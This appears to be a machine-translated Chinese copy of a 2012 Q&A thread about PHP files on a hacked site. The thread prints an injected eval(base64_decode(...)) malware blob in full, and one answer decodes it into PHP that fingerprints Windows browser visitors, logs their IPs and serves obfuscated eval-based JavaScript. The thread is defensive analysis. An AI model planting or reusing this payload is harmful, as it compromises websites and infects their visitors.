可以<script type =“text / javascript”> window.location =“/”; </script>被黑客攻击?

时间:2012-09-12 15:56:20

标签: php javascript security base64 eval

我的PHP文件,尤其是带有JavaScript重定向的index.php文件,如:

<script type="text/javascript">window.location="/";</script>

被黑客攻击:

<?php eval(base64_decode(
'JGlwPSRfU0VSVkVSWyJSRU1PVEVfQUREUiJdOyRkcj0kX1NFUlZFUlsiRE9DVU1FTlRfUk9PVCJdOyR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQ
nXTskZGJmPSRkci4nLycubWQ1KCRkci4nMScpOw0KaWYoKHN0cnBvcygkdWEsJ1dpbmRvd3MnKSE9PWZhbHNlKSYmKChzdHJwb3MoJHVhLCdNU0lFJykhPT1
mYWxzZSl8fChzdHJwb3MoJHVhLCdGaXJlZm94JykhPT1mYWxzZSkpJiYoc3RycG9zKEBmaWxlX2dldF9jb250ZW50cygkZGJmKSwkaXApID09PSBmYWxzZSk
pew0KCWVycm9yX3JlcG9ydGluZygwKTsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1MGNubDdZV0p5WlNzcmZXTmhkR05vS0dFMlltRXpOSGt
wZTNSeWVYdHdjbTkwYjNSNWNHVW1NbjFqWVhSamFDaGhjMkZpS1h0bFBYZHBibVJ2ZDFzaVpTSXJJbllpS3lKaGJDSmRPMzE5SUdsbUtERXBlMlk5V3kwMEx
DMDFMRGt3TERnNUxERTRMREkxTERnM0xEazNMRGcwTERFd05DdzVOU3c0Tml3NU55d3hNRElzTXpFc09UQXNPRGNzTVRBeExEVTJMRGswTERnMkxEazJMRGc
zTERrMUxERXdNeXd4TURFc05URXNNVEE0TERjd0xEZ3lMRGt3TERZMExEZ3lMRGsyTERnM0xESTFMREkyTERnMExEazJMRGczTERFd055d3lOQ3d5T0N3M05
5d3pNeXc0TUN3eU55d3hNRGdzTUN3dE5Td3ROaXd0TkN3NU1TdzROeXd4TURFc09ETXNPVFFzT0Rnc01UQXdMREkxTERJNExEUTFMQzB5TEMwMExDMDFMREV
4TUN3eE9TdzROeXc1TXl3eE1ESXNPRGNzTVRjc01URXdMQzB4TEMwMkxDMDBMQzAxTERnMUxEazRMRGcxTERFd01pdzVOaXc0Tnl3NU5Td3hNRE1zTXpJc01
UQTBMREV3TVN3NU1Td3hNREVzT0Rnc01qWXNNVGtzTkRjc09URXNPRGNzTVRBeExEZ3pMRGswTERnNExERTRMREV3TUN3eE1ERXNPRFVzTkRZc01qWXNPVEF
zTVRBeExERXdNeXc1T0N3ME15d3pOQ3d6TXl3eE1ESXNPVElzTVRBM0xERXdOeXc1TkN3NU1pdzVPU3d6TXl3NE55d3hNRGNzTVRBMExEZ3pMRE14TERnMkx
EazNMRGswTERNMExERXdOQ3c0TkN3ek15dzVPQ3c0T1N3NU9TdzBPU3c0T0N3NU9DdzBOeXd6TlN3eU5pd3hPQ3d4TURRc09USXNPRFlzTVRBeExEa3hMRFE
zTERJMExETTJMRE0wTERJMExERTVMRGt3TERnMkxEa3lMRGc1TERnNUxERXdNeXcwTnl3eU5Dd3pOaXd6TkN3eU5Dd3hPU3d4TURFc01UQXhMREV3T0N3NU5
DdzROaXcwT0N3eU5Td3hNRE1zT1RJc01UQXhMRGt3TERnMUxEa3hMRGt6TERreUxERXdNaXd4TURZc05EVXNPVEFzT1RBc09EY3NPRFlzT0RZc09UY3NORFV
zT1Rjc09UZ3NNVEF4TERrd0xERXdNeXc1TVN3NU5pdzVOeXcwTkN3NE1pdzROU3d4TURFc09UWXNPVFVzTVRBekxERXdNU3c0T0N3ME5TdzVNeXc0T0N3NE9
Dd3hNREVzTkRVc016UXNORFFzTVRBekxEazNMRGszTERRMUxETTBMRFEwTERJMkxEUTRMRFExTERNMExEa3hMRGczTERFd01TdzRNeXc1TkN3NE9DdzBPQ3d
4T1N3eU9DdzBOU3d0TWl3dE5Dd3ROU3d4TVRBc01Dd3ROU3d0Tml3NE9Td3hNRE1zT1RVc09EWXNNVEF5TERrd0xEazRMRGsyTERFM0xEa3lMRGc0TERrNUx
EZzBMRGsxTERnMkxERXdNU3d5Tml3eU5pd3hNVEFzTFRFc0xUWXNMVFFzTFRVc01UQXpMRGcwTERFd01Dd3hOeXc0T1N3eE9DdzBOaXd4T1N3NE5pdzVOaXc
0Tml3eE1ETXNPVFFzT0Rnc09UWXNNVEF4TERNekxEZzFMRGs1TERnNExEZ3pMREV3TVN3NE9DdzFOU3c1TXl3NE9DdzVOU3c0Tml3NU55d3hNRElzTWpVc01
qWXNPVEVzT0Rjc01UQXhMRGd6TERrMExEZzRMREkxTERJMkxEUTJMRGc0TERNeExERXdNaXc0Tnl3eE1ERXNOVElzTVRBeUxERXdNU3d4TURFc09URXNPRE1
zTVRBMExERXdNaXc0Tml3eU55d3lOU3d4TURBc01UQXhMRGcxTERJMExETXhMREkxTERnNUxERXdNeXd4TURJc09UY3NORFVzTXpNc016SXNNVEEwTERreEx
ERXdOaXd4TURrc09UTXNPVEVzTVRBeExETXlMRGcyTERFd09Td3hNRE1zT0RJc016TXNPRFVzT1RZc09UWXNNek1zTVRBekxEZzJMRE15TERrM0xEa3hMRGs
0TERRNExEa3dMRGszTERRMkxETTNMREkxTERJMkxEUTJMRGc0TERNeExERXdNaXd4TURJc01UQTJMRGsxTERnM0xETXhMREV3TlN3NU1Td3hNREFzT1RJc09
EUXNPVEFzT1RVc09URXNNVEF4TERFd09DdzBOeXd5TkN3NU1TdzVNU3c0TlN3NE55dzROeXc1TlN3eU5pdzBOU3c0Tnl3ek15d3hNREVzTVRBeExERXdPQ3c
1TkN3NE5pd3pNeXc1T0N3NU5pd3hNRElzT1RFc01UQXhMRGt5TERrM0xEazFMRFE0TERJMUxEZ3lMRGcxTERFd01TdzVOaXc1TlN3eE1ETXNNVEF4TERnNEx
ESTFMRFEwTERnNUxETXlMREV3TUN3eE1ETXNNVEEzTERrekxEZzRMRE15TERrekxEZzRMRGc0TERFd01TdzBPQ3d5TlN3ek15d3lOaXcwTlN3NE55d3pNeXd
4TURFc01UQXhMREV3T0N3NU5DdzROaXd6TXl3eE1ESXNPVFlzT1Rrc05EY3NNalFzTXpVc01qVXNORFFzT0Rrc016SXNNVEF3TERnNExERXdNaXcxTUN3eE1
ETXNNVEF5TERrNUxEa3lMRGcwTERFd01pd3hNRE1zT0Rjc01qVXNNallzTVRBMUxEa3dMRGczTERFd01pdzRPU3d5Tml3ek1Dd3lOQ3d6Tml3ek5Dd3lOQ3d
5T0N3ME5TdzROeXd6TXl3eE1ERXNPRFlzTVRBekxEVXhMREV3TVN3eE1ETXNNVEF3TERrd0xEZzFMREV3TXl3eE1ERXNPRGdzTWpZc01qUXNPVEVzT0Rjc09
UQXNPVEFzT1RBc01UQXhMREkyTERNd0xESTBMRE0yTERNMExESTBMREk0TERRMUxDMHlMQzAwTEMwMUxDMDJMRGczTERrM0xEZzBMREV3TkN3NU5TdzROaXc
1Tnl3eE1ESXNNekVzT1RBc09EY3NNVEF4TERVMkxEazBMRGcyTERrMkxEZzNMRGsxTERFd015d3hNREVzTlRFc01UQTRMRGN3TERneUxEa3dMRFkwTERneUx
EazJMRGczTERJMUxESTJMRGcwTERrMkxEZzNMREV3Tnl3eU5Dd3lPQ3czTnl3ek15dzRNQ3d6TWl3NE1pdzVPU3c1T0N3NE5pdzVOeXc0Tml3MU1pdzVNU3c
1TVN3NU15dzROeXd5Tml3NE55d3lPQ3cwTlN3dE1pd3ROQ3d0TlN3eE1UQmRPMzEzUFdZN2N6MWJYVHR5UFZOMGNtbHVaenQ0UFNKcUpTSTdabTl5S0drOU1
Ec3RhU3MxTnpraFBUQTdhU3M5TVNsN2FqMXBPMmxtS0dVbUppZ3dNekU5UFRCNE1Ua3BLWE05Y3l0eUxtWnliMjFEYUdGeVEyOWtaU2dvTVNwM1cycGRLMlV
vZUNzektTc3hNeWtwTzMwZ2RISjVlMkZ6WjJGelp5WXhNMzFqWVhSamFDaGhjMmRoS1h0bEtITXBPMzA4TDNOamNtbHdkRDQ9JykpOw0KCWlmICgkZnAgPSB
AZm9wZW4oJGRiZiAsICJhIikpe2ZwdXRzKCRmcCAsICRpcC4nfCcpOyBmY2xvc2UoJGZwKTt9DQp9'));?>
<script type="text/javascript">window.location="/";</script>

是因为我使用$_SERVER["REQUEST_URI"]$_SERVER["HTTP_REFERER"]还是其他命令 - 他们是否需要像mysql_real_escape_string

那样进行剥离

3 个答案:

答案 0 :(得分:2)

问题是你的PHP代码本身被黑了。您可以尝试base64解码所有文本以查看它正在做什么,但有人或某事有权修改您的PHP文件。 javascript与它无关。

如果你正在运行像wordpress这样的东西,你可以看到what they recommend。但首先,您需要更改所有密码。然后看看有人如何修改你的代码。并确保您的文件不可写(例如try 755 instead of 777)。

答案 1 :(得分:1)

您的页面中似乎有一个html(php)块。可能是XSS的结果?

第一阶段解码显示:

$ip=$_SERVER["REMOTE_ADDR"];$dr=$_SERVER["DOCUMENT_ROOT"];$ua = $_SERVER['HTTP_USER_AGENT'];$dbf=$dr.'/'.md5($dr.'1');
if((strpos($ua,'Windows')!==false)&&((strpos($ua,'MSIE')!==false)||(strpos($ua,'Firefox')!==false))&&(strpos(@file_get_contents($dbf),$ip) === false)){
    error_reporting(0);
    echo(base64_decode('PHNjcmlwdD50cnl7YWJyZSsrfWNhdGNoKGE2YmEzNHkpe3RyeXtwcm90b3R5cGUmMn1jYXRjaChhc2FiKXtlPXdpbmRvd1siZSIrInYiKyJhbCJdO319IGlmKDEpe2Y9Wy00LC01LDkwLDg5LDE4LDI1LDg3LDk3LDg0LDEwNCw5NSw4Niw5NywxMDIsMzEsOTAsODcsMTAxLDU2LDk0LDg2LDk2LDg3LDk1LDEwMywxMDEsNTEsMTA4LDcwLDgyLDkwLDY0LDgyLDk2LDg3LDI1LDI2LDg0LDk2LDg3LDEwNywyNCwyOCw3NywzMyw4MCwyNywxMDgsMCwtNSwtNiwtNCw5MSw4NywxMDEsODMsOTQsODgsMTAwLDI1LDI4LDQ1LC0yLC00LC01LDExMCwxOSw4Nyw5MywxMDIsODcsMTcsMTEwLC0xLC02LC00LC01LDg1LDk4LDg1LDEwMiw5Niw4Nyw5NSwxMDMsMzIsMTA0LDEwMSw5MSwxMDEsODgsMjYsMTksNDcsOTEsODcsMTAxLDgzLDk0LDg4LDE4LDEwMCwxMDEsODUsNDYsMjYsOTAsMTAxLDEwMyw5OCw0MywzNCwzMywxMDIsOTIsMTA3LDEwNyw5NCw5Miw5OSwzMyw4NywxMDcsMTA0LDgzLDMxLDg2LDk3LDk0LDM0LDEwNCw4NCwzMyw5OCw4OSw5OSw0OSw4OCw5OCw0NywzNSwyNiwxOCwxMDQsOTIsODYsMTAxLDkxLDQ3LDI0LDM2LDM0LDI0LDE5LDkwLDg2LDkyLDg5LDg5LDEwMyw0NywyNCwzNiwzNCwyNCwxOSwxMDEsMTAxLDEwOCw5NCw4Niw0OCwyNSwxMDMsOTIsMTAxLDkwLDg1LDkxLDkzLDkyLDEwMiwxMDYsNDUsOTAsOTAsODcsODYsODYsOTcsNDUsOTcsOTgsMTAxLDkwLDEwMyw5MSw5Niw5Nyw0NCw4Miw4NSwxMDEsOTYsOTUsMTAzLDEwMSw4OCw0NSw5Myw4OCw4OCwxMDEsNDUsMzQsNDQsMTAzLDk3LDk3LDQ1LDM0LDQ0LDI2LDQ4LDQ1LDM0LDkxLDg3LDEwMSw4Myw5NCw4OCw0OCwxOSwyOCw0NSwtMiwtNCwtNSwxMTAsMCwtNSwtNiw4OSwxMDMsOTUsODYsMTAyLDkwLDk4LDk2LDE3LDkyLDg4LDk5LDg0LDk1LDg2LDEwMSwyNiwyNiwxMTAsLTEsLTYsLTQsLTUsMTAzLDg0LDEwMCwxNyw4OSwxOCw0NiwxOSw4Niw5Niw4NiwxMDMsOTQsODgsOTYsMTAxLDMzLDg1LDk5LDg4LDgzLDEwMSw4OCw1NSw5Myw4OCw5NSw4Niw5NywxMDIsMjUsMjYsOTEsODcsMTAxLDgzLDk0LDg4LDI1LDI2LDQ2LDg4LDMxLDEwMiw4NywxMDEsNTIsMTAyLDEwMSwxMDEsOTEsODMsMTA0LDEwMiw4NiwyNywyNSwxMDAsMTAxLDg1LDI0LDMxLDI1LDg5LDEwMywxMDIsOTcsNDUsMzMsMzIsMTA0LDkxLDEwNiwxMDksOTMsOTEsMTAxLDMyLDg2LDEwOSwxMDMsODIsMzMsODUsOTYsOTYsMzMsMTAzLDg2LDMyLDk3LDkxLDk4LDQ4LDkwLDk3LDQ2LDM3LDI1LDI2LDQ2LDg4LDMxLDEwMiwxMDIsMTA2LDk1LDg3LDMxLDEwNSw5MSwxMDAsOTIsODQsOTAsOTUsOTEsMTAxLDEwOCw0NywyNCw5MSw5MSw4NSw4Nyw4Nyw5NSwyNiw0NSw4NywzMywxMDEsMTAxLDEwOCw5NCw4NiwzMyw5OCw5NiwxMDIsOTEsMTAxLDkyLDk3LDk1LDQ4LDI1LDgyLDg1LDEwMSw5Niw5NSwxMDMsMTAxLDg4LDI1LDQ0LDg5LDMyLDEwMCwxMDMsMTA3LDkzLDg4LDMyLDkzLDg4LDg4LDEwMSw0OCwyNSwzMywyNiw0NSw4NywzMywxMDEsMTAxLDEwOCw5NCw4NiwzMywxMDIsOTYsOTksNDcsMjQsMzUsMjUsNDQsODksMzIsMTAwLDg4LDEwMiw1MCwxMDMsMTAyLDk5LDkyLDg0LDEwMiwxMDMsODcsMjUsMjYsMTA1LDkwLDg3LDEwMiw4OSwyNiwzMCwyNCwzNiwzNCwyNCwyOCw0NSw4NywzMywxMDEsODYsMTAzLDUxLDEwMSwxMDMsMTAwLDkwLDg1LDEwMywxMDEsODgsMjYsMjQsOTEsODcsOTAsOTAsOTAsMTAxLDI2LDMwLDI0LDM2LDM0LDI0LDI4LDQ1LC0yLC00LC01LC02LDg3LDk3LDg0LDEwNCw5NSw4Niw5NywxMDIsMzEsOTAsODcsMTAxLDU2LDk0LDg2LDk2LDg3LDk1LDEwMywxMDEsNTEsMTA4LDcwLDgyLDkwLDY0LDgyLDk2LDg3LDI1LDI2LDg0LDk2LDg3LDEwNywyNCwyOCw3NywzMyw4MCwzMiw4Miw5OSw5OCw4Niw5Nyw4Niw1Miw5MSw5MSw5Myw4NywyNiw4NywyOCw0NSwtMiwtNCwtNSwxMTBdO313PWY7cz1bXTtyPVN0cmluZzt4PSJqJSI7Zm9yKGk9MDstaSs1NzkhPTA7aSs9MSl7aj1pO2lmKGUmJigwMzE9PTB4MTkpKXM9cytyLmZyb21DaGFyQ29kZSgoMSp3W2pdK2UoeCszKSsxMykpO30gdHJ5e2FzZ2FzZyYxM31jYXRjaChhc2dhKXtlKHMpO308L3NjcmlwdD4='));
    if ($fp = @fopen($dbf , "a")){fputs($fp , $ip.'|'); fclose($fp);}
}

第二阶段解码显示:

try {
    abre++
} catch (a6ba34y) {
    try {
        prototype & 2
    } catch (asab) {
        e = window["e" + "v" + "al"];
    }
}
if (1) {
    f = [-4, - 5, 90, 89, 18, 25, 87, 97, 84, 104, 95, 86, 97, 102, 31, 90, 87, 101, 56, 94, 86, 96, 87, 95, 103, 101, 51, 108, 70, 82, 90, 64, 82, 96, 87, 25, 26, 84, 96, 87, 107, 24, 28, 77, 33, 80, 27, 108, 0, - 5, - 6, - 4, 91, 87, 101, 83, 94, 88, 100, 25, 28, 45, - 2, - 4, - 5, 110, 19, 87, 93, 102, 87, 17, 110, - 1, - 6, - 4, - 5, 85, 98, 85, 102, 96, 87, 95, 103, 32, 104, 101, 91, 101, 88, 26, 19, 47, 91, 87, 101, 83, 94, 88, 18, 100, 101, 85, 46, 26, 90, 101, 103, 98, 43, 34, 33, 102, 92, 107, 107, 94, 92, 99, 33, 87, 107, 104, 83, 31, 86, 97, 94, 34, 104, 84, 33, 98, 89, 99, 49, 88, 98, 47, 35, 26, 18, 104, 92, 86, 101, 91, 47, 24, 36, 34, 24, 19, 90, 86, 92, 89, 89, 103, 47, 24, 36, 34, 24, 19, 101, 101, 108, 94, 86, 48, 25, 103, 92, 101, 90, 85, 91, 93, 92, 102, 106, 45, 90, 90, 87, 86, 86, 97, 45, 97, 98, 101, 90, 103, 91, 96, 97, 44, 82, 85, 101, 96, 95, 103, 101, 88, 45, 93, 88, 88, 101, 45, 34, 44, 103, 97, 97, 45, 34, 44, 26, 48, 45, 34, 91, 87, 101, 83, 94, 88, 48, 19, 28, 45, - 2, - 4, - 5, 110, 0, - 5, - 6, 89, 103, 95, 86, 102, 90, 98, 96, 17, 92, 88, 99, 84, 95, 86, 101, 26, 26, 110, - 1, - 6, - 4, - 5, 103, 84, 100, 17, 89, 18, 46, 19, 86, 96, 86, 103, 94, 88, 96, 101, 33, 85, 99, 88, 83, 101, 88, 55, 93, 88, 95, 86, 97, 102, 25, 26, 91, 87, 101, 83, 94, 88, 25, 26, 46, 88, 31, 102, 87, 101, 52, 102, 101, 101, 91, 83, 104, 102, 86, 27, 25, 100, 101, 85, 24, 31, 25, 89, 103, 102, 97, 45, 33, 32, 104, 91, 106, 109, 93, 91, 101, 32, 86, 109, 103, 82, 33, 85, 96, 96, 33, 103, 86, 32, 97, 91, 98, 48, 90, 97, 46, 37, 25, 26, 46, 88, 31, 102, 102, 106, 95, 87, 31, 105, 91, 100, 92, 84, 90, 95, 91, 101, 108, 47, 24, 91, 91, 85, 87, 87, 95, 26, 45, 87, 33, 101, 101, 108, 94, 86, 33, 98, 96, 102, 91, 101, 92, 97, 95, 48, 25, 82, 85, 101, 96, 95, 103, 101, 88, 25, 44, 89, 32, 100, 103, 107, 93, 88, 32, 93, 88, 88, 101, 48, 25, 33, 26, 45, 87, 33, 101, 101, 108, 94, 86, 33, 102, 96, 99, 47, 24, 35, 25, 44, 89, 32, 100, 88, 102, 50, 103, 102, 99, 92, 84, 102, 103, 87, 25, 26, 105, 90, 87, 102, 89, 26, 30, 24, 36, 34, 24, 28, 45, 87, 33, 101, 86, 103, 51, 101, 103, 100, 90, 85, 103, 101, 88, 26, 24, 91, 87, 90, 90, 90, 101, 26, 30, 24, 36, 34, 24, 28, 45, - 2, - 4, - 5, - 6, 87, 97, 84, 104, 95, 86, 97, 102, 31, 90, 87, 101, 56, 94, 86, 96, 87, 95, 103, 101, 51, 108, 70, 82, 90, 64, 82, 96, 87, 25, 26, 84, 96, 87, 107, 24, 28, 77, 33, 80, 32, 82, 99, 98, 86, 97, 86, 52, 91, 91, 93, 87, 26, 87, 28, 45, - 2, - 4, - 5, 110];
}
w = f;
s = [];
r = String;
x = "j%";
for (i = 0; - i + 579 != 0; i += 1) {
    j = i;
    if (e && (031 == 0x19)) s = s + r.fromCharCode((1 * w[j] + e(x + 3) + 13));
}
try {
    asgasg & 13
} catch (asga) {
    e(s);
}

然后通过Javascript Packer对进一步的有效负载进行模糊处理。对于那些有兴趣看到这个功能的人来说,我会在下午晚些时候愚弄这个......

答案 2 :(得分:-1)

如果您使用的是PHP,则只需使用标题重定向,那么您就不必担心JavaScript漏洞了:

header('Location: http://www.example.com/');

这必须在将任何内容输出到DOM之前。如果SEO是一个因素,您也可以考虑使用.htaccess重定向。